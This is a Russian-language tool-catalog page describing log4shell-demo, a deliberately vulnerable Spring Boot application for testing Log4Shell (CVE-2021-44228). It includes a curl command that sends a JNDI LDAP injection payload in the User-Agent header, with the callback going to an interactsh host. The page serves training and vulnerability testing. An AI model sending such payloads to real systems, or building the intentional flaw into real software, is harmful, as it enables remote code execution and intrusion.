Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4shell-demo — Простое веб-приложение, уязвимое к Log4Shell (CVE-2021-44228) | Kitploit
Инструменты/GitHubGitHub/korteke/log4shell-demo
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubkorteke/log4shell-demo

log4shell-demo

Простое веб-приложение, уязвимое к Log4Shell (CVE-2021-44228)

Репозиторий
2434 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Простое приложение Spring Boot, уязвимое для Log4Shell (CVE-2021-44228)

  • Изменена стандартная система логирования с logback на log4j2

Приложение логирует заголовок 'User-Agent', поэтому можно проверить уязвимость с помощью curl и, например, interactsh-service:

curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/

Должна появиться DNS-взаимодействие на app.interactsh.com.

Docker hub

Ссылка на Docker hub

Скачать инструмент